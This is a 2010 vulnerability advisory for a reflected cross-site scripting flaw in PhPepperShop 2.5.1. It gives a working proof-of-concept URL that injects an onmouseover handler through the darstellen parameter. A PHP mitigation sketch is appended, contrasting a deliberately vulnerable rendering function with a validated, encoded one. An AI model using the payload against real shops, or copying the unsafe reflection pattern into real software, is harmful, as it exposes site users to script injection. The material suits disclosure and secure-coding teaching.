==============================================================================
      [~] PhPepperShop Webshop 2.5 (XSS) Cross Site Scripting Vulnerability
==============================================================================

    [+] My home             [ http://hack-tech.com ]
    [+] Date Submitted:     [ January 12 2010 ]
    [+] Founder:            [ Crux ]
    [+] Vendor:             [ http://www.phpeppershop.com/ ]
    [+] Version:            [ 2.5.1 ]
    [+] Greetz:             [ HT Team, All Maldivians and my love <3 ]
    [+] Dork:               [ NO NO NO! ]

###############################################################################

 [ EXPLOIT ]

[Path]/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971

 [ DEMO ]

http://site.com/shop/USER_ARTIKEL_HANDLING_AUFRUF.php?darstellen=1\"+onmouseover%3Dalert(411780276689)+&lowlimit=0&highlimit=15&bilderanzeigen=true&Suchstring=111-222-1933email%40address.tst&javascript_enabled=true&PEPPERSESS=d0499c7999470455b75dc23b45e7fb1b&w=1280&h=971

==============================================================================
###############################################################################
~ There is no right and wrong, There's only fun and boring. :-) ~ Crux
###############################################################################
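
 [ MITIGATION EXAMPLE ]

Added example, not part of the original advisory and not PhPepperShop code: a sketch of the fix for a value like darstellen, assuming it is echoed into a double-quoted HTML attribute (the advisory does not show the server-side code). The function names and the input fields rendered here are hypothetical.

```php
<?php
// Added example, not PhPepperShop code. Function names are hypothetical.

// Vulnerable pattern (assumed): the raw value lands inside a quoted attribute,
// so a double quote in the input ends the attribute and starts a new one.
function render_unsafe(array $query): string
{
    return '<input type="hidden" name="darstellen" value="'
        . ($query['darstellen'] ?? '') . '">';
}

// Accept only decimal digits; anything else falls back to the default.
function int_param(array $query, string $name, int $default): int
{
    $raw = $query[$name] ?? null;
    return (is_string($raw) && ctype_digit($raw)) ? (int) $raw : $default;
}

// Encode for a quoted attribute: ENT_QUOTES covers both " and '.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: validate numeric fields, encode every reflected value.
function render_safe(array $query): string
{
    $darstellen = int_param($query, 'darstellen', 1);
    $such = is_string($query['Suchstring'] ?? null) ? $query['Suchstring'] : '';
    return '<input type="hidden" name="darstellen" value="' . $darstellen . '">' . "\n"
        . '<input type="text" name="Suchstring" value="' . attr($such) . '">';
}

// Constructed input: the URL-decoded query values from the advisory's request.
$query = [
    'darstellen' => '1\\" onmouseover=alert(411780276689) ',
    'Suchstring' => '111-222-1933email@address.tst',
];

echo render_unsafe($query), "\n";  // raw reflection of the request value
echo render_safe($query), "\n";    // validated integer and encoded string
```

The same treatment applies to the other numeric parameters in the request (lowlimit, highlimit, w, h): parse them as integers before use and encode anything that is written back into the page.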